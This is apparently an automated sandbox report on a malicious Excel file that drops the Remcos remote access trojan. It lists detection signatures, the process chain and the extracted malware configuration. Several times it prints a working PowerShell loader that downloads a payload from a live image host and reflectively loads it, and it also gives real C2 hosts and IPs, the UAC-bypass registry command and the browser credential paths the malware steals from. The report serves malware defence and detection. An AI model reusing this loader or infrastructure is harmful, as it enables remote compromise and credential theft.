Windows Analysis Report
Ref19920830281982938RT.xls

Overview

General Information

Sample name: Ref19920830281982938RT.xls
Analysis ID: 1447833
MD5: f5051793b6c98a29efba84f3821d1e30
SHA1: b6b446e72525796444ae132fbb6af6788f08c5de
SHA256: 191a46b3849f0cc60ac2e0a3387585dd9c34e2b28cb66bffdbda08238ee53710
Tags: xls

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Sigma detected: Remcos
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Creates autostart registry keys with suspicious values (likely registry only malware)
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Microsoft Office drops suspicious files
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1648 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 1668 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3300 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3400 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 3956 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
          • RegAsm.exe (PID: 3964 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
          • RegAsm.exe (PID: 3972 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • wscript.exe (PID: 3204 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs" MD5: 045451FA238A75305CC26AC982472367)
  • wscript.exe (PID: 2420 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs" MD5: 045451FA238A75305CC26AC982472367)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-999Z97", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "nots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0x1b17:$obj2: \objdata
  • 0x1aff:$obj3: \objupdate
  • 0x1adb:$obj4: \objemb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0x1b17:$obj2: \objdata
  • 0x1aff:$obj3: \objupdate
  • 0x1adb:$obj4: \objemb
C:\Users\user\AppData\Local\Temp\note\nots.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
    Source | Rule | Description | Author | Strings
    00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
      00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
        00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
        • 0x6c4a8:$a1: Remcos restarted by watchdog!
        • 0x6ca20:$a3: %02i:%02i:%02i:%03i
        00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
        • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6656c:$str_b2: Executing file:
        • 0x675ec:$str_b3: GetDirectListeningPort
        • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67118:$str_b7: \update.vbs
        • 0x66594:$str_b9: Downloaded file:
        • 0x66580:$str_b10: Downloading file:
        • 0x66624:$str_b12: Failed to upload file:
        • 0x675b4:$str_b13: StartForward
        • 0x675d4:$str_b14: StopForward
        • 0x67070:$str_b15: fso.DeleteFile "
        • 0x67004:$str_b16: On Error Resume Next
        • 0x670a0:$str_b17: fso.DeleteFolder "
        • 0x66614:$str_b18: Uploaded file:
        • 0x665d4:$str_b19: Unable to delete:
        • 0x67038:$str_b20: while fso.FileExists("
        • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
        00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
        • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x6637c:$s1: CoGetObject
        • 0x66390:$s1: CoGetObject
        • 0x663ac:$s1: CoGetObject
        • 0x70338:$s1: CoGetObject
        • 0x6633c:$s2: Elevation:Administrator!new:
        Source | Rule | Description | Author | Strings
        17.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
          17.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
            17.2.RegAsm.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
            • 0x6c4a8:$a1: Remcos restarted by watchdog!
            • 0x6ca20:$a3: %02i:%02i:%02i:%03i
            17.2.RegAsm.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
            • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6656c:$str_b2: Executing file:
            • 0x675ec:$str_b3: GetDirectListeningPort
            • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x67118:$str_b7: \update.vbs
            • 0x66594:$str_b9: Downloaded file:
            • 0x66580:$str_b10: Downloading file:
            • 0x66624:$str_b12: Failed to upload file:
            • 0x675b4:$str_b13: StartForward
            • 0x675d4:$str_b14: StopForward
            • 0x67070:$str_b15: fso.DeleteFile "
            • 0x67004:$str_b16: On Error Resume Next
            • 0x670a0:$str_b17: fso.DeleteFolder "
            • 0x66614:$str_b18: Uploaded file:
            • 0x665d4:$str_b19: Unable to delete:
            • 0x67038:$str_b20: while fso.FileExists("
            • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
            17.2.RegAsm.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
            • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x6637c:$s1: CoGetObject
            • 0x66390:$s1: CoGetObject
            • 0x663ac:$s1: CoGetObject
            • 0x70338:$s1: CoGetObject
            • 0x6633c:$s2: Elevation:Administrator!new:

            Exploits

            Source: Network Connection, Author: Joe Security: Data: DestinationIp: 198.46.178.154, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3300, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
            Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3300, TargetFilename: C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs

            Spreading

            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; 
return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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
            Source: Network Connection, Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49171, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3300, Protocol: tcp, SourceIp: 198.46.178.154, SourceIsIpv6: false, SourcePort: 80
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { 
$downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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
            Source: Network Connection, Author: frack113, Florian Roth: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3400, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1648, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , ProcessId: 3400, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1648, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , ProcessId: 3400, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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
            Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\incontrovertido.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3608, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Path
            Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 54.241.153.192, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1648, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
            Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3856, TargetFilename: C:\ProgramData\incontrovertido.vbs
            Source: Network Connection, Author: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3400, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = 
[System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3608, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs, ProcessId: 3856, ProcessName: powershell.exe
            Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1648, Protocol: tcp, SourceIp: 54.241.153.192, SourceIsIpv6: false, SourcePort: 80
